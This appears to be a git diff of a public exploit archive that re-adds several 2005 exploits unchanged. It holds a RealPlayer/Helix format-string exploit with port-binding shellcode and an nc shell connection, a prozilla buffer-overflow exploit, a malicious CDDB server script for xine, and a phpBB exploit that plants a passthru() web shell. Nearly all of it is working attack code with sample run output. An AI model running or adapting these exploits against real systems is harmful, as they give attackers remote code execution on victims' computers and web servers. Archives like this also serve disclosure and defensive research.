-"\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05" -"\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f" -"\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff" -"\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f" -"\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f" -"\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e" -"\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff" -"\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c" -"\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21" -"\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d" -"\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78" -"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff" -"\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5" -"\xd3\x9e"; - -long jmp = 0x0804d938; // push esp; ret 0x0807; ;-) - -int main(int argc, char **argv, char **envp) { - char buff[512]; - int i; - FILE *fd; - - printf("\n[*] Creating buffer\n"); - strcpy(buff, "[Frame 11 EBP]--points to-->[Frame 12 EBP] - - And can be manipulated something like so: - - -------- -------- -------- - Frame 10 Frame 11 Frame 12 - -------- -------- -------- - 1|------------\/ - [LSBMSB] [LSBMSB]-- [41414141] - 2|____________^ 3|__________^ - - Well, it doesn't work :-( ..ebp gets moved to esp in frame 11 and it ends with EIP pointing at 0x00000000. - - So what else can I do? - - How about use the fact the file being played is under my control and only the MSB needs overwritten. This - solves the problem with the size of the valaue I can write. It is possible to modify the MSB of an EBP - that is reachable, eventually leading to EIP pointing at some good location after "mov %ebp,%esp" happens, - resulting in the execution of our shellcode. - - 1-> Create a file with shellcode address `printf "\x37\x13\x12\x08"`.rp - 2-> Overwrite EBP MSB with the address of the file location on the stack - 3-> EBP is moved to ESP - 4-> EIP is changed to ESP value - 5-> EIP is owned, shell is spawned - - Granted this is not a stable method as the user can freely manipulate their environment, and we use the - file name, which is stored in an environment variable to trampoline us to the shellcode. However my goal - here is not to create a worm but a proof-of-concept :p - - The supplied POC should work flawlessly on Debian 3.1, with RealPlayer installed in /usr/local/RealPlayer - and run as shown below. - - Sample local run: - - Test System: Debian 3.1 against RealPlayer10.0.5.756 Gold - - Window 1: - --------- - c0ntex@debauch:~$ netstat -an --ip - Active Internet connections (servers and established) - Proto Recv-Q Send-Q Local Address Foreign Address State - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - tcp 0 0 192.168.88.133:22 192.168.88.1:2080 ESTABLISHED - udp 0 0 0.0.0.0:68 0.0.0.0:* - c0ntex@debauch:~$ ./helix4real - - Remote format string exploit POC for UNIX RealPlayer && HelixPlayer - Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version - by c0ntex || c0ntexb@gmail.com || http://www.open-security.org - - [-] Creating file [VY~Ò.rp] - [-] Using [148] stack pops - [-] Modifying EBP MSB with value [64105] - [-] Completed creation of test file! - [-] Executing RealPlayer now... - [-] Connecting to shell in 10 seconds - ** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW ** - - (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text() - - (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text() - - ps -ef | tail -12; - ... - c0ntex 1631 1624 0 01:10 pts/2 00:00:00 /bin/sh /usr/bin/realplay ./VYF&(?.rp - c0ntex 1636 1631 4 01:10 pts/2 00:00:02 /bin//sh - c0ntex 1637 1636 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp - c0ntex 1638 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp - c0ntex 1639 1636 0 01:10 pts/2 00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp - c0ntex 1640 1636 0 01:10 pts/2 00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp - c0ntex 1641 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp - c0ntex 1642 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp - c0ntex 1643 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp - ... - - To exploit this remotly, a user just needs to place the created file on a web site and provide a link so - users can click the file, launching RealPlayer and exploiting the vulnerability. - - Real have been duely informed about this issue and are fixing. Sadly though, it seems someone is trying to - pinch my research, as such I have been forced to release this advisory sooner than hoped. Until Real get - a new release out, do not play untrusted media with RealPlayer or HelixPlayer. Sorry Real.com! - - Moral of the story, don't talk about personal research on IRC. Thank you plagiarizers. - - PS: A new RSS feed for the latest 5 Open Security Group Advisories, @ http://www.open-security.org/adv.xml - is now available. - - */ - - -#include -#include -#include -#include - -#define BUFFER 10000 -#define EBPMSB 64105 -#define HOST "localhost" -#define NETCAT "/bin/nc" -#define NOPS 0x90 -#define STACKPOP 148 -#define VULN "/usr/local/RealPlayer/realplay" - -char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70"; - -/* metasploit port binding shellcode = 4444 */ -char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66" - "\x58\x99\x89\xe1\xcd\x80\x96\x43\x52" - "\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a" - "\x66\x58\x50\x51\x56\x89\xe1\xcd\x80" - "\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56" - "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a" - "\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9" - "\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68" - "\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89" - "\xe1\xcd\x80"; - - -int -filegen(char *shellcode) -{ - FILE *rp; - - printf("[-] Creating file [%s]\n", filename); - - rp = fopen(filename, "w"); - if(!rp) { - puts("[!] Could not fopen file!"); - free(shellcode); - return(EXIT_FAILURE); - } - - printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", STACKPOP, EBPMSB); - - fprintf(rp, - "\n" - "\n" - "\n" - "\n" - "", EBPMSB, STACKPOP, shellcode); - fclose(rp); - - free(shellcode); shellcode = NULL; - - return(EXIT_SUCCESS); -} - - -int -main(int argc, char **argv) -{ - char *shellcode = NULL; - - puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer"); - puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version"); - puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n"); - - shellcode = (char *)malloc(BUFFER); - if(!shellcode) { - puts("[!] Could not malloc"); - return(EXIT_FAILURE); - } - - memset(shellcode, NOPS, BUFFER); - memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode)); - shellcode[BUFFER] = '\0'; - - filegen(shellcode); - - puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now..."); - - switch(fork()) { - case -1: - puts("[!] Could not fork off, bailing!"); - return(EXIT_FAILURE); - case 0: - if(execl(VULN, "realplay", filename, NULL) <0) { - puts("[!] Could not execute realplayer... :("); - return(EXIT_FAILURE); - } - } - - puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **"); - sleep(10); - - if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) { - puts("[!] Could not connect, check the core file!"); - return(EXIT_FAILURE); - } - - return(EXIT_SUCCESS); -} - -// milw0rm.com [2005-09-26] + /* + ***************************************************************************************************************** + $ An open security advisory #13 - RealPlayer and Helix Player Remote Format String Exploit + ***************************************************************************************************************** + 1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com + 2: Bug Released: September 26th 2005 + 3: Bug Impact Rate: Hi + 4: Bug Scope Rate: Remote + ***************************************************************************************************************** + $ This advisory and/or proof of concept code must not be used for commercial gain. + ***************************************************************************************************************** + + UNIX RealPlayer && Helix Player + http://real.com + http://helixcommunity.org + + "The Helix Player is the Helix Community's open source media player for consumers. It is being developed + to have a rich and usable graphical interface and support a variety of open media formats like Ogg Vorbis, + Theora etc. + The RealPlayer for Linux is built on top of the Helix Player for Linux and includes support for several + non-open source components including RealAudio/RealVideo, MP3 etc." + + There is a remotly exploitable format string vulnerability in the latest Helix Media Player suit that will + allow an attacker the possibility to execute malicious code on a victims computer. The exploit code will + execute a remote shell under the permissions of the user running the media player, and effects all versions + of RealPlayer and Helix Player. + + The bug is exploitable by abusing media, including .rp (relpix)and .rt (realtext) file formats. Although + others may be effected I stick to realpix file format for this advisory. + + Almost all media file input is placed on the heap, so it's not possible to just pop our way to a supplied + string like with a normal stack based format bug, as such we can't directly modify GOT, DTORS, etc. leaving + us limited to what we can do. + + There are several places where we can control the flow of execution: + + popN - call *0x04(eax) - eax is controlled + popN+N - call *0x20(eax) - eax is controlled + popN+NN - call *0x100(edx) - edx is controlled + popN+NNN - ebp - ebp is controlled + popN+NNNN - eip - eip is controlled + .... + + however since we are limited to the size of the value that can be written, it doesn't seem possible to + point at a known good location directly. Since our shellcode is always mapped via the .rp file between + 0x0822**** - 0x082f**** and with control of one pointer at a time usually, we can not reach the LSB, we + are toast. + + In a phrack paper, Riq talks about using sections of the base pointer to create a 4 byte pointer by + chaining EBP like so: + + [Frame 10 EBP]--points to-->[Frame 11 EBP]--points to-->[Frame 12 EBP] + + And can be manipulated something like so: + + -------- -------- -------- + Frame 10 Frame 11 Frame 12 + -------- -------- -------- + 1|------------\/ + [LSBMSB] [LSBMSB]-- [41414141] + 2|____________^ 3|__________^ + + Well, it doesn't work :-( ..ebp gets moved to esp in frame 11 and it ends with EIP pointing at 0x00000000. + + So what else can I do? + + How about use the fact the file being played is under my control and only the MSB needs overwritten. This + solves the problem with the size of the valaue I can write. It is possible to modify the MSB of an EBP + that is reachable, eventually leading to EIP pointing at some good location after "mov %ebp,%esp" happens, + resulting in the execution of our shellcode. + + 1-> Create a file with shellcode address `printf "\x37\x13\x12\x08"`.rp + 2-> Overwrite EBP MSB with the address of the file location on the stack + 3-> EBP is moved to ESP + 4-> EIP is changed to ESP value + 5-> EIP is owned, shell is spawned + + Granted this is not a stable method as the user can freely manipulate their environment, and we use the + file name, which is stored in an environment variable to trampoline us to the shellcode. However my goal + here is not to create a worm but a proof-of-concept :p + + The supplied POC should work flawlessly on Debian 3.1, with RealPlayer installed in /usr/local/RealPlayer + and run as shown below. + + Sample local run: + + Test System: Debian 3.1 against RealPlayer10.0.5.756 Gold + + Window 1: + --------- + c0ntex@debauch:~$ netstat -an --ip + Active Internet connections (servers and established) + Proto Recv-Q Send-Q Local Address Foreign Address State + tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN + tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN + tcp 0 0 192.168.88.133:22 192.168.88.1:2080 ESTABLISHED + udp 0 0 0.0.0.0:68 0.0.0.0:* + c0ntex@debauch:~$ ./helix4real + + Remote format string exploit POC for UNIX RealPlayer && HelixPlayer + Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version + by c0ntex || c0ntexb@gmail.com || http://www.open-security.org + + [-] Creating file [VY~Ò.rp] + [-] Using [148] stack pops + [-] Modifying EBP MSB with value [64105] + [-] Completed creation of test file! + [-] Executing RealPlayer now... + [-] Connecting to shell in 10 seconds + ** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW ** + + (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text() + + (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text() + + ps -ef | tail -12; + ... + c0ntex 1631 1624 0 01:10 pts/2 00:00:00 /bin/sh /usr/bin/realplay ./VYF&(?.rp + c0ntex 1636 1631 4 01:10 pts/2 00:00:02 /bin//sh + c0ntex 1637 1636 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp + c0ntex 1638 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp + c0ntex 1639 1636 0 01:10 pts/2 00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp + c0ntex 1640 1636 0 01:10 pts/2 00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp + c0ntex 1641 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp + c0ntex 1642 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp + c0ntex 1643 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp + ... + + To exploit this remotly, a user just needs to place the created file on a web site and provide a link so + users can click the file, launching RealPlayer and exploiting the vulnerability. + + Real have been duely informed about this issue and are fixing. Sadly though, it seems someone is trying to + pinch my research, as such I have been forced to release this advisory sooner than hoped. Until Real get + a new release out, do not play untrusted media with RealPlayer or HelixPlayer. Sorry Real.com! + + Moral of the story, don't talk about personal research on IRC. Thank you plagiarizers. + + PS: A new RSS feed for the latest 5 Open Security Group Advisories, @ http://www.open-security.org/adv.xml + is now available. + + */ + + +#include +#include +#include +#include + +#define BUFFER 10000 +#define EBPMSB 64105 +#define HOST "localhost" +#define NETCAT "/bin/nc" +#define NOPS 0x90 +#define STACKPOP 148 +#define VULN "/usr/local/RealPlayer/realplay" + +char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70"; + +/* metasploit port binding shellcode = 4444 */ +char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66" + "\x58\x99\x89\xe1\xcd\x80\x96\x43\x52" + "\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a" + "\x66\x58\x50\x51\x56\x89\xe1\xcd\x80" + "\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56" + "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a" + "\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9" + "\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68" + "\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89" + "\xe1\xcd\x80"; + + +int +filegen(char *shellcode) +{ + FILE *rp; + + printf("[-] Creating file [%s]\n", filename); + + rp = fopen(filename, "w"); + if(!rp) { + puts("[!] Could not fopen file!"); + free(shellcode); + return(EXIT_FAILURE); + } + + printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", STACKPOP, EBPMSB); + + fprintf(rp, + "\n" + "\n" + "\n" + "\n" + "", EBPMSB, STACKPOP, shellcode); + fclose(rp); + + free(shellcode); shellcode = NULL; + + return(EXIT_SUCCESS); +} + + +int +main(int argc, char **argv) +{ + char *shellcode = NULL; + + puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer"); + puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version"); + puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n"); + + shellcode = (char *)malloc(BUFFER); + if(!shellcode) { + puts("[!] Could not malloc"); + return(EXIT_FAILURE); + } + + memset(shellcode, NOPS, BUFFER); + memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode)); + shellcode[BUFFER] = '\0'; + + filegen(shellcode); + + puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now..."); + + switch(fork()) { + case -1: + puts("[!] Could not fork off, bailing!"); + return(EXIT_FAILURE); + case 0: + if(execl(VULN, "realplay", filename, NULL) <0) { + puts("[!] Could not execute realplayer... :("); + return(EXIT_FAILURE); + } + } + + puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **"); + sleep(10); + + if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) { + puts("[!] Could not connect, check the core file!"); + return(EXIT_FAILURE); + } + + return(EXIT_SUCCESS); +} + +// milw0rm.com [2005-09-26] diff --git a/platforms/linux/remote/1238.c b/platforms/linux/remote/1238.c index d3f493a24..e3a55ff8e 100755 --- a/platforms/linux/remote/1238.c +++ b/platforms/linux/remote/1238.c @@ -1,47 +1,47 @@ -#include -#include -#include - -#define OVERFLOW (1<<10)+32 -#define SLEDSIZ (1<<10) -#define RETADDR 0x806977a+SLEDSIZ/2 -#define OUTPUT "AdvResults.asp" - -/* -* prozilla bug, found while auditing for gentoo bug #70090 -* -taviso@gentoo.org -*/ - -/* execve() /bin/id */ -unsigned char shellcode[] = -"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e" -"\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3" -"\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc" -"\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07" -"\x9f\xcf\x2d\x8e"; - -int main(int argc, char **argv) -{ -unsigned char *buf; -void *ret = (void *) RETADDR; -FILE *exploit; -int i; - -exploit = fopen(OUTPUT, "w"); -fprintf(exploit, "
");
-
-buf = malloc(OVERFLOW);
-for (i = 0; buf + i < buf + OVERFLOW; i += sizeof(void *))
-memcpy(buf + i, &ret, sizeof(void *));
-fwrite(buf, OVERFLOW, 1, exploit);
-fprintf(exploit, "
"); -buf = realloc(buf, SLEDSIZ + sizeof(shellcode)); -memset(buf, 0x90, SLEDSIZ); -memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode)); -fwrite(buf, SLEDSIZ + sizeof(shellcode), 1, exploit); -free(buf); -fprintf(stderr, "[*] %s created.\n", OUTPUT); -return 0; -} - -// milw0rm.com [2005-10-02] +#include +#include +#include + +#define OVERFLOW (1<<10)+32 +#define SLEDSIZ (1<<10) +#define RETADDR 0x806977a+SLEDSIZ/2 +#define OUTPUT "AdvResults.asp" + +/* +* prozilla bug, found while auditing for gentoo bug #70090 +* -taviso@gentoo.org +*/ + +/* execve() /bin/id */ +unsigned char shellcode[] = +"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e" +"\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3" +"\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc" +"\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07" +"\x9f\xcf\x2d\x8e"; + +int main(int argc, char **argv) +{ +unsigned char *buf; +void *ret = (void *) RETADDR; +FILE *exploit; +int i; + +exploit = fopen(OUTPUT, "w"); +fprintf(exploit, "
");
+
+buf = malloc(OVERFLOW);
+for (i = 0; buf + i < buf + OVERFLOW; i += sizeof(void *))
+memcpy(buf + i, &ret, sizeof(void *));
+fwrite(buf, OVERFLOW, 1, exploit);
+fprintf(exploit, "
"); +buf = realloc(buf, SLEDSIZ + sizeof(shellcode)); +memset(buf, 0x90, SLEDSIZ); +memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode)); +fwrite(buf, SLEDSIZ + sizeof(shellcode), 1, exploit); +free(buf); +fprintf(stderr, "[*] %s created.\n", OUTPUT); +return 0; +} + +// milw0rm.com [2005-10-02] diff --git a/platforms/linux/remote/1242.pl b/platforms/linux/remote/1242.pl index d8e5ecb0f..24f986cef 100755 --- a/platforms/linux/remote/1242.pl +++ b/platforms/linux/remote/1242.pl @@ -1,141 +1,141 @@ -#!/usr/bin/perl -- -# When playing an Audio CD, using xine-lib based media application, -# the library contacts a CDDB server to retrieve metadata like the -# title and artist's name. During processing of this data, a response -# from the server, which is located in memory on the stack, is passed -# to the fprintf() function as a format string. -# An attacker can set up a malicious CDDB server and trick the client -# into using this server instead of the pre-configured one. Alternatively, -# any user and therefore the attacker can modify entries in the official -# CDDB server. Using this format string vulnerability, attacker-chosen -# data can be written to an attacker-chosen memory location. This allows -# the attacker to alter the control flow and to execute malicious code with -# the permissions of the user running the application. -# Although it requires the user to play an Audio CD, this vulnerability can -# still be exploited remotely, because a xine Audio CD MRL -# (media resource locator) could be embedded into a website. Added for future ref. /str0ke - -# xine-cddb-server -# by Ulf Harnhammar in 2005 -# I hereby place this program in the public domain. - -use strict; -use IO::Socket; - -$main::port = 8880; -$main::timeout = 5; - - -# *** SUBROUTINES *** - - -sub mysend($$) -{ - my $file = shift; - my $str = shift; - - print $file "$str\n"; - print "SENT: $str\n"; -} # sub mysend - - -sub myreceive($) -{ - my $file = shift; - my $inp; - - eval - { - local $SIG{ALRM} = sub { die "alarm\n" }; - alarm $main::timeout; - $inp = <$file>; - alarm 0; - }; - - if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; } - $inp =~ tr/\015\012\000//d; - print "RECEIVED: $inp\n"; - $inp; -} # sub myreceive - - -# *** MAIN PROGRAM *** - - -{ - my $server = IO::Socket::INET->new( Proto => 'tcp', - LocalPort => $main::port, - Listen => SOMAXCONN, - Reuse => 1); - die "can't set up server!\n" unless $server; - - - while (my $client = $server->accept()) - { - $client->autoflush(1); - print 'connection from '.$client->peerhost."\n"; - - - mysend($client, '201 metaur CDDBP server v1.5PL2 ready at '. - scalar localtime); - - while (my $str = myreceive($client)) - { - if ($str =~ m/^cddb hello ([^ ]+) ([^ ]+) (.+)$/i) - { - mysend($client, "200 Hello and welcome $1\@$2 running $3."); - next; - } - - if ($str =~ m/^proto (\d+)$/i) - { - mysend($client, "201 OK, CDDB protocol level now: $1"); - next; - } - - if ($str =~ m/^cddb query ([0-9a-f]+)/i) - { - mysend($client, "200 rock $1 Exploiters / Formatted and Stringed"); - next; - } - - if ($str =~ m/^cddb read ([a-z]+) ([0-9a-f]+)/i) - { - my $docum = <accept() -} - -# milw0rm.com [2005-10-10] +#!/usr/bin/perl -- +# When playing an Audio CD, using xine-lib based media application, +# the library contacts a CDDB server to retrieve metadata like the +# title and artist's name. During processing of this data, a response +# from the server, which is located in memory on the stack, is passed +# to the fprintf() function as a format string. +# An attacker can set up a malicious CDDB server and trick the client +# into using this server instead of the pre-configured one. Alternatively, +# any user and therefore the attacker can modify entries in the official +# CDDB server. Using this format string vulnerability, attacker-chosen +# data can be written to an attacker-chosen memory location. This allows +# the attacker to alter the control flow and to execute malicious code with +# the permissions of the user running the application. +# Although it requires the user to play an Audio CD, this vulnerability can +# still be exploited remotely, because a xine Audio CD MRL +# (media resource locator) could be embedded into a website. Added for future ref. /str0ke + +# xine-cddb-server +# by Ulf Harnhammar in 2005 +# I hereby place this program in the public domain. + +use strict; +use IO::Socket; + +$main::port = 8880; +$main::timeout = 5; + + +# *** SUBROUTINES *** + + +sub mysend($$) +{ + my $file = shift; + my $str = shift; + + print $file "$str\n"; + print "SENT: $str\n"; +} # sub mysend + + +sub myreceive($) +{ + my $file = shift; + my $inp; + + eval + { + local $SIG{ALRM} = sub { die "alarm\n" }; + alarm $main::timeout; + $inp = <$file>; + alarm 0; + }; + + if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; } + $inp =~ tr/\015\012\000//d; + print "RECEIVED: $inp\n"; + $inp; +} # sub myreceive + + +# *** MAIN PROGRAM *** + + +{ + my $server = IO::Socket::INET->new( Proto => 'tcp', + LocalPort => $main::port, + Listen => SOMAXCONN, + Reuse => 1); + die "can't set up server!\n" unless $server; + + + while (my $client = $server->accept()) + { + $client->autoflush(1); + print 'connection from '.$client->peerhost."\n"; + + + mysend($client, '201 metaur CDDBP server v1.5PL2 ready at '. + scalar localtime); + + while (my $str = myreceive($client)) + { + if ($str =~ m/^cddb hello ([^ ]+) ([^ ]+) (.+)$/i) + { + mysend($client, "200 Hello and welcome $1\@$2 running $3."); + next; + } + + if ($str =~ m/^proto (\d+)$/i) + { + mysend($client, "201 OK, CDDB protocol level now: $1"); + next; + } + + if ($str =~ m/^cddb query ([0-9a-f]+)/i) + { + mysend($client, "200 rock $1 Exploiters / Formatted and Stringed"); + next; + } + + if ($str =~ m/^cddb read ([a-z]+) ([0-9a-f]+)/i) + { + my $docum = <accept() +} + +# milw0rm.com [2005-10-10] diff --git a/platforms/linux/remote/1247.pl b/platforms/linux/remote/1247.pl index af41cbae6..2ad436cd4 100755 --- a/platforms/linux/remote/1247.pl +++ b/platforms/linux/remote/1247.pl @@ -1,222 +1,222 @@ -#!/usr/bin/perl - -### r57phpbb_admin2exec.pl -### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -### phpBB admin_styles.php commands execution exploit -### tested on phpBB 2.0.13 -### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -### by 1dt.w0lf -### RST/GHC -### http://rst.void.ru -### http://ghc.ru -### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -### screen -### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -c get_prefix -### ----------------------------------------------------------------------------------- -### [~] Try to get prefix ...[ DONE ] -### PREFIX : phpbb_ -### ----------------------------------------------------------------------------------- -### -### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -P phpbb_ -### ----------------------------------------------------------------------------------- -### [!] Method 2 - use "create\export style" -### [~] Try to run sql query in database ... [ DONE ] -### [~] Creating new style ... [ DONE ] -### [~] Creating file ... [ DONE ] -### [+] File successfully created! Now you can try execute command! -### [~] Delete style from database ... [ DONE ] -### ----------------------------------------------------------------------------------- -### -### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -c "uname -sr; id" -### ----------------------------------------------------------------------------------- -### FreeBSD 5.3-RELEASE -### uid=80(www) gid=80(www) groups=80(www) -### ----------------------------------------------------------------------------------- -### 20.04.2005 - -use LWP::UserAgent; -use Getopt::Std; - -getopts("p:s:P:c:m:"); - -$path = $opt_p; -$sid = $opt_s; -$prefix = $opt_P || 'phpbb_'; -$cmd = $opt_c || 'create'; -$method = $opt_m || 2; - -#################### LITTLE CONFIG -# forum on win or unix? commands split by ; or && -$cmdspl = ';'; # unix -# filename for create. default is 'theme_info.cfg' for include in admin_styles.php?mode=addnew -# DONT CHANGE if you don't know that you do!!! -$filename = '/theme_info.cfg'; -# folder for create file, we need folder writable for apache user, by default we use /tmp -$dir = '../../../../../../../../../../../../../../../../../../../../../tmp'; -#################### END CONFIG - -if(!$path || !$sid) { &usage; } - -$xpl = LWP::UserAgent->new() or die; - -if($cmd eq 'clear') - { - &show_header; - print "-----------------------------------------------------------------------------------\n"; - print "[~] Clearing database ... "; - $sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="" AND template_name="";'; - $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); - if(!$suc) { print " [ FAILED ]\n"; exit(); } - if($suc == 1) { print " [ DONE ]\n"; } - print "-----------------------------------------------------------------------------------\n"; - exit(); - } - -if($cmd eq 'create' && $method == 1) - { - &show_header; - print "-----------------------------------------------------------------------------------\n"; - print "[!] Method 1 - use \"INTO OUTFILE\"\n"; - print "[!] Create file for including.\n"; - print "[~] Try to run sql query in database..."; - $sql = 'SELECT \'\' FROM '.$prefix.'users LIMIT 1 INTO OUTFILE \''.$dir.$filename.'\';'; - $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); - if(!$suc) { print " [ FAILED ]\n"; exit(); } - if($suc == 2) { print " [ DONE ]\n[!] File already exists! Now you can try execute command!\n"; } - if($suc == 1) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; } - print "-----------------------------------------------------------------------------------\n"; - exit(); - } - -if($cmd eq 'get_prefix') - { - &show_header; - print "-----------------------------------------------------------------------------------\n"; - print "[~] Try to get prefix ..."; - $res = $xpl->get( - "${path}admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=0&backupstart=1&gzipcompress=0&startdownload=1&sid=$sid" - ); - if($res->is_success && $res->content =~ /(TABLE: )(.*)(auth_access)/) - { - $prefix = ($2)?($2):("No prefix"); - print "[ DONE ]\nPREFIX : $prefix\n"; - } - else { print "[ FAILED ]\n"; } - print "-----------------------------------------------------------------------------------\n"; - exit(0); - } - -if($cmd eq 'create' && $method == 2) - { - &show_header; - print "-----------------------------------------------------------------------------------\n"; - print "[!] Method 2 - use \"create\\export style\"\n"; - print "[~] Try to run sql query in database ..."; - $sql = 'ALTER TABLE `'.$prefix.'themes` CHANGE `template_name` `template_name` VARCHAR( 255 ) NOT NULL;'; - $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); - if(!$suc) { print " [ FAILED ]\n"; exit(); } - if($suc == 1) { print " [ DONE ]\n"; } - print "[~] Creating new style ..."; - $res = $xpl->post( - "${path}admin_styles.php?sid=$sid", - [ - 'style_name' => '0wn', - 'template_name' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir, - 'mode' => 'create', - 'submit' => 'Save Settings' - ], - ); - if($res->is_success){ print " [ DONE ]\n[~] Creating file ..."; } - else { print " [ FAILED ]\n"; exit(0); } - $res = $xpl->post( - "${path}admin_styles.php?sid=$sid", - [ - 'export_template' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir, - 'mode' => 'export', - 'edit' => 'Submit' 